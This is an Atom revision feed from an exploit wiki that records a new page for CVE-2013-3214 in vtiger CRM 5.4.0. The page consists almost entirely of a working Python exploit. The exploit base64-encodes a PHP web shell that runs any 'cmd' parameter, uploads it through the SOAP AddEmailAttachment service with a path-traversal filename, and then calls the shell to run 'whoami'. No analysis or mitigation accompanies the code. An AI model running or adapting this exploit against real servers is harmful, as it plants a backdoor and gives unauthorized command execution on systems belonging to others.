https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E CVE-2013-3214 vtiger CRM 5.4.0 PHP代碼注入漏洞 - Revision history 2026-04-14T14:45:10Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1020&oldid=prev Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/env python3 import requests from base64 import b64encode # parameters depend on environment. host = '192.168.85.133' port = 8888 uri = '/' url = f'..." 2021-04-06T02:49:13Z <p>Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python3 import requests from base64 import b64encode # parameters depend on environment. host = &#039;192.168.85.133&#039; port = 8888 uri = &#039;/&#039; url = f&#039;...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> #!/usr/bin/env python3<br /> <br /> import requests<br /> from base64 import b64encode<br /> <br /> # parameters depend on environment.<br /> host = '192.168.85.133'<br /> port = 8888<br /> uri = '/'<br /> <br /> url = f'http://{host}:{port}{uri}vtigerservice.php?service=outlook'<br /> <br /> headers = {'Content-Type': 'text/xml', 'charset': 'UTF-8'}<br /> <br /> <br /> payload = &quot;&quot;&quot;<br /> &lt;?php<br /> if(isset($_REQUEST['cmd'])){<br /> echo &quot;&lt;pre&gt;&quot;;<br /> $cmd = ($_REQUEST['cmd']);<br /> system($cmd);<br /> echo &quot;&lt;/pre&gt;&quot;;<br /> die;<br /> }<br /> ?&gt;<br /> &quot;&quot;&quot;<br /> <br /> encoded_payload = b64encode(payload.encode()).decode()<br /> filename = &quot;cmd.php&quot;<br /> <br /> data = f&quot;&quot;&quot;<br /> &lt;soapenv:Envelope xmlns:crm=&quot;http://www.vtiger.com/products/crm&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;&gt;<br /> &lt;soapenv:Header/&gt;<br /> &lt;soapenv:Body&gt;<br /> &lt;crm:AddEmailAttachment soapenv:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;&gt;<br /> &lt;emailid xsi:type=&quot;xsd:string&quot;&gt;ptFINT&lt;/emailid&gt;<br /> &lt;filedata xsi:type=&quot;xsd:string&quot;&gt;{encoded_payload}&lt;/filedata&gt;<br /> &lt;filename xsi:type=&quot;xsd:string&quot;&gt;../../../../../../{filename}&lt;/filename&gt;<br /> &lt;filesize xsi:type=&quot;xsd:string&quot;&gt;{len(payload)}&lt;/filesize&gt;<br /> &lt;filetype xsi:type=&quot;xsd:string&quot;&gt;php&lt;/filetype&gt;<br /> &lt;username xsi:type=&quot;xsd:string&quot;&gt;Pbghh&lt;/username&gt;<br /> &lt;session xsi:type=&quot;xsd:string&quot;/&gt;<br /> &lt;/crm:AddEmailAttachment&gt;<br /> &lt;/soapenv:Body&gt;<br /> &lt;/soapenv:Envelope&gt;<br /> &quot;&quot;&quot;<br /> <br /> # send the requests<br /> <br /> print(&quot;Sending ...&quot;)<br /> print(data)<br /> requests.post(url, headers=headers, data=data)<br /> <br /> print(&quot;Test command whoami ...&quot;)<br /> resp = requests.get(f'http://{host}:{port}{uri}{filename}?cmd=whoami')<br /> <br /> print(resp.text)<br /> <br /> &lt;/pre&gt;</div> Pwnwiki